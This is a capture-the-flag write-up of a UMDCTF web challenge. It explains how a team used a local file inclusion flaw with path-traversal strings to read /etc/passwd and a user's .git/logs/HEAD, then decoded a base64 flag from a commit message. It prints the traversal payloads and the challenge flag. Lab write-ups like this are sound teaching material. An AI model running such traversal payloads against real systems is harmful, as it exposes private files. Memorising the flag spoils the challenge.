SignStealingSoftware-P2

Description:

We are now in the system! Looks like the developers are still there, now we just need to find the key so we can create more user accounts, so our team can steal all the signs! http://159.89.228.183:8081

Foreword

A web exploitation challenge in UMDCTF, where we placed 1st internationally. Shoutout to the University of Maryland for hosting such a fun event :)

Introduction

When we login into the given domain, we can immediately spot an LFI vulnerability in the way the presented gifs are being loaded:

sss1

As a result of the LFI, we have the ability to view a file’s content, but we don’t have the ability to locate files that we seek in the system. We thought of 2 different possible approaches: A. find a vulnerability in the source code B. leak information about the system in common files and try to navigate to the flag

Analysis

First of all, we checked how the source code works. Assuming this is a typical PHP page when querying for index.php we get the following result:

sss2

Erm, nothing interesting… We did try to find an RCE vulnerability in the PHP function get_file_contents, and to load our own URLs but all of these ideas failed. Well, now for the approach that worked for us, option B.

When querying for ./../../../../etc/passwd, one cat spot the existent of a few different user accounts. One of them, suspiciously, is called gitserver:

sss3

Solving All of a sudden, we had an “Aha!” moment; let’s revisit the challenge description: “We are now in the system! Looks like the developers are still there” That must be the developers’ user! We immediately checked if a git repo exists in the gitserver user’s home folder by querying for ./../../../../home/gitserver/.git/HEAD. At this point we looked for common files that exist in the .git directory. There is a writeup of web2_200 in nullconCTF 2018, contains useful common file paths in the .git directory, one of which is .git/logs/HEAD which is responsible for useful log info – such as commits.

sss4

After performing some research, an idea struck our minds – the flag might be in a commit’s comment! We checked the log file’s contents (./../../../../home/gitserver/.git/logs/HEAD ).

sss5

Aha! VU1EQ1RGLXtZbzBfS04wd19UaDNfTjNYdF9wMXRDSH0= is valid base64! We can execute the following command : echo 'VU1EQ1RGLXtZbzBfS04wd19UaDNfTjNYdF9wMXRDSH0=' | base64 -d.

Flag: UMDCTF-{Yo0_KN0w_Th3_N3Xt_p1tCH}